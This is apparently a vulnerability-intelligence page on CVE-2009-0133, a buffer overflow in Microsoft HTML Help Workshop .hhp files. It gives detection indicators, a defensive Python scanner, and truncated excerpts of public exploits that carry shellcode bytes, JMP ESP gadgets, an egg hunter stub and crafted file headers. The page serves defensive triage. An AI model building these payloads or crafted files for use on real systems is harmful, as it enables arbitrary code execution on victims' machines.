CVE-2009-0133
Published 2009-01-15
Priority: P2 (59) · CVSS 2.0: 10.0 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit available · EPSS: 67.05% (99.2nd percentile)
Buffer overflow in Microsoft HTML Help Workshop 4.74 and earlier allows context-dependent attackers to execute arbitrary code via a .hhp file with a long "Index file" field, possibly a related issue to CVE-2006-0564.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | html_help_workshop | — | — |
Detection & IOCs (extracted from sources)
- bytes: \x5d\x38\x82\x7c (JMP ESP in ntdll.dll, used as EIP overwrite)
- bytes: \x5d\x38\x82\x7c (JMP ESP, repeated at offsets 272-296)
- bytes: \x93\x1f\x40\x00 (Call EDI in hhw.exe)
- bytes: 0x77E859BA (return address overwrite at overflow[280])
- bytes: egg hunter tag \x69\x72\x61\x71\x69\x72\x61\x71 ("iraqiraq")
- bytes: egg hunter stub \x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7
- Malicious .hhp files exploit the 'Index file' or 'Compiled file' field in the [OPTIONS] section with an oversized value (hundreds of bytes) to trigger a stack buffer overflow in HTML Help Workshop 4.74.
- Look for .hhp files where the 'Compiled file=' or 'Index file=' value in [OPTIONS] is abnormally long (>230 bytes); this is the overflow trigger pattern used across all known exploits.
- Detect NOP sled patterns (0x90 repeated) followed by shellcode within .hhp file field values, a common payload delivery pattern in these exploits.
- The Metasploit module targets this vulnerability by creating a specially crafted .hhp file; monitor for hhw.exe opening .hhp files from untrusted locations followed by unexpected child process spawning.
- The exploit overwrites EIP at offset 280; a return address of 0x77E859BA or 0x7c82385d appearing in crash dumps of hhw.exe is indicative of exploitation attempts.
- A bind shell on port 13579 is spawned by one of the known shellcode payloads; detect unexpected listening on TCP/13579 after hhw.exe execution.
- The egg hunter tag 'iraq' (bytes 0x69 0x72 0x61 0x71) is repeated twice as a marker within the payload; scan .hhp file content for this byte sequence.
- Caveat: the JMP ESP gadget address 0x7c82385d is specific to Windows XP SP2 ntdll.dll and will not be valid on other OS versions or patch levels.
- Caveat: the 'Call EDI' gadget at 0x00401f93 in hhw.exe is described as 'universal' by the exploit author but is tied to a specific build of hhw.exe version 4.74.
- Caveat: the return address 0x77E859BA used in exploit 1495 is specific to the Windows XP SP2 Russian edition.
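A defender-side triage check built from the indicators listed above, added here as an example (it is not from the page or from any of the listed exploits): it parses the [OPTIONS] section of a .hhp file and flags oversized 'Index file' / 'Compiled file' values, a run of 0x90 NOPs, the 'iraqiraq' egg tag and the listed gadget addresses. The two sample files, the 8-byte NOP threshold and the little-endian encodings of the addresses are assumptions.

```python
import re
from typing import List

# Thresholds and markers taken from the indicators listed above.
FIELD_MAX = 230                                   # longer [OPTIONS] values match the trigger pattern
SUSPECT_KEYS = (b"index file", b"compiled file")
NOP_SLED = re.compile(rb"\x90{8,}")               # 8+ consecutive NOPs (threshold is an assumption)
EGG_TAG = b"iraqiraq"                             # egg hunter marker from the known payload
GADGETS = {                                       # little-endian byte forms of the listed addresses
    b"\x5d\x38\x82\x7c": "0x7c82385d (JMP ESP, ntdll.dll, XP SP2)",
    b"\x93\x1f\x40\x00": "0x00401f93 (CALL EDI, hhw.exe 4.74)",
    b"\xba\x59\xe8\x77": "0x77E859BA (return address, XP SP2 RUS)",
}
# Constructed samples: a benign project file and one shaped like the public PoCs.
BENIGN = (b"[OPTIONS]\r\nCompiled file=manual.chm\r\nIndex file=manual.hhk\r\n\r\n"
          b"[FILES]\r\nindex.htm\r\n")
SUSPECT = (b"[OPTIONS]\r\nCompatibility=1.1 or later\r\nCompiled file=" + b"A" * 300
           + b"\x5d\x38\x82\x7c" + b"\x90" * 16 + EGG_TAG
           + b"\r\nDisplay compile progress=No\r\n\r\n[INFOTYPES]\r\n")

def options_section(data: bytes) -> bytes:
    """Return the body of [OPTIONS], i.e. everything up to the next [SECTION] header."""
    m = re.search(rb"(?ism)^\[OPTIONS\]\r?\n(.*?)(?=^\[[^\]\r\n]+\]|\Z)", data)
    return m.group(1) if m else b""

def scan_hhp(data: bytes) -> List[str]:
    """Return findings for one .hhp file; an empty list means nothing matched."""
    findings = []
    for line in options_section(data).splitlines():      # bytes.splitlines: \r, \n, \r\n only
        key, sep, value = line.partition(b"=")
        name = key.strip()
        if sep and name.lower() in SUSPECT_KEYS and len(value) > FIELD_MAX:
            findings.append(f"oversized {name.decode(errors='replace')} value ({len(value)} bytes)")
    if NOP_SLED.search(data):
        findings.append("NOP sled (run of 0x90) in file content")
    if EGG_TAG in data:
        findings.append("egg hunter tag 'iraqiraq' present")
    for needle, desc in GADGETS.items():
        if needle in data:
            findings.append(f"known gadget/return address {desc}")
    return findings

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, scan_hhp(sample) or ["clean"])
```

The address matches are only meaningful for the XP SP2 builds named in the caveats above; the oversized-field check is the one that generalizes across the known exploits.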
No detection rules found.
Exploit-DB · 2010-09-25 · CVE-2009-0133
Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3)
---
```ruby
##
# $Id: hhw_hhp_indexfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
      'Description'    => %q{
          This module exploits a stack buffer overflow in HTML Help Workshop 4.74.
        By creating a specially crafted hhp file, an attacker may be able
        to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Encrypt3d.M!nd', 'loneferret', 'jduck' ],
      '
```
Exploit-DB · 2009-12-05 · CVE-2009-0133
Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)
---
```python
#exploit.py
#
# HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# By: Encrypt3d.M!nd
# http://m1nd3d.wordpress.com/
# Based on: http://www.milw0rm.com/exploits/7727
####################################################################
# Well, I've tested SKD Exploit on Win 7 and it didn't work. I think it's
# a Shellhunter compatibility problem, so I wrote this and used the egg hunting
# method. It would take some time to execute the shellcode, but it will run ;-)
#
# Tested on : Windows xp sp3
#             Windows 7 ultimate
#
hhp_data1 =("\x5B\x4F\x50\x54\x49\x4F\x4E\x53"
            "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65"
            "\x6E\x74\x73\x20\x66\x69\x6C\x65"
            "\x3D\x41\x0D\x0A\x49\x6E\x64\x65"
            "\x78\x20\x66\x69\x6C\x65\x3D")
crlf =("\x
```
Exploit-DB · 2009-01-12 · CVE-2009-0133
Microsoft HTML Workshop 4.74 - Universal Buffer Overflow
---
```perl
#!/usr/bin/perl
# Microsoft HTML Workshop http://msdn.microsoft.com/en-us/library/ms669985.aspx
#
# If you are interested in my method and want to learn something new or
# improve your exploitation skills then visit my team's blog at:
# -> http://abysssec.com
#
# Peace out,
# SkD.

my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
                "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
                "\x6E\x74\x73\x20\x66\x69\x6C\x65".
                "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
                "\x78\x20\x66\x69\x6C\x65\x3D";
my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
                "\x0A\x61\x2E\x68\x74\x6D";
my $crlf = "\x0d\x0a";

# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\
```
Exploit-DB · 2006-02-14 · CVE-2006-0564
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)
---
```c
/*
\ Windows HTML Help Workshop Index File Stack Overflow Exploit
/ by Darkeagle
\
/ [http://eagle.blacksecurity.org]
\
/ MS coders codes so secure code. Keep coding }:>
\
/ Original Advisory: http://eagle.blacksecurity.org/stuff/unl0ck/adv/55k700206.txt
\
/ Exploit tested in WinXP SP2 RUS.
\
*/
#include
#include
#include "stdafx.h"

char ep[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=XAKEP.chm\n"
"Index File=";

char pro[]=
"Display compile progress=No\n"
"Language=0x43f Казахский\n\n\n"
"[INFOTYPES]";

char shellcode[]=
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6
```
Exploit-DB · 2006-02-11 · CVE-2009-0133
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)
---
```c
/*
Microsoft HTML Help Workshop .hhp file Compiled File Header Buffer Overflow Exploit
The Buffer Overflow in Compiled File in Options in a HHP file.
Bug found by: darkeagle
Exploit coded by: k3xji
Mail: [email protected]
Web: www.guvenliklab.com
Tested: Win XP SP2
*/
#include
#include
#include

#define BUFLEN 0xe6

char sta[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=";

char fin[]=
"Display compile progress=No\n"
"Language=Turkish\n\n\n"
"[INFOTYPES]";

char jmpcode[]= "\x5d\x38\x82\x7c\x5d\x38\x82\x7c\x90\x90\x90\x90\x83\xEC\x34\x90\x83\xEC\x78\x90\xFF\xE4\x90\x90";

char shellcode[]=
//Taken from ATmaCA's Execute Calc.exe shellcode. Thx. A bit lazy to call ExitProcess :P
"\x54\x50\x53\x50\x29\xc9\x83\xe9
```
Exploit-DB · 2006-02-10 · CVE-2006-0564
Microsoft HTML Help Workshop - '.hhp' Denial of Service
---
```ini
[OPTIONS]
Compatibility=1.1 or later
Compiled file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaUUUUr0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Display compile progress=No
Language=0x419 Русский
[INFOTYPES]

# milw0rm.com [2006-02-10]
```
Exploit-DB · 2006-02-06 · CVE-2009-0133
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)
---
```c
/*
Microsoft HTML Help Workshop .hhp file Buffer Overflow Exploit
by bratax (http://www.bratax.be/)

-> greets to:
all my miffm00f buddies, BuzzDee and everyone else I forgot who should be in here

-> thx to:
Curt Wilson @ SIUC (maybe you don't know why but this exploit wouldn't
exist if we didn't have that conversation a long long time ago)
nolimit & buzzdee (I used most of your realplayer .smil exploit code because I
didn't feel like writing this code from scratch :p)

-> special thx to:
duksie, dwarf & turb00 (you guys know why)

C:\htmlws>poc2
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (http://www.bratax.be/).
Usage: C:\htmlws\PoC2.exe

C:\htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Wo
```
Metasploit · CVE-2009-0133
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.
No writeups or analysis indexed.
Published: 2009-01-15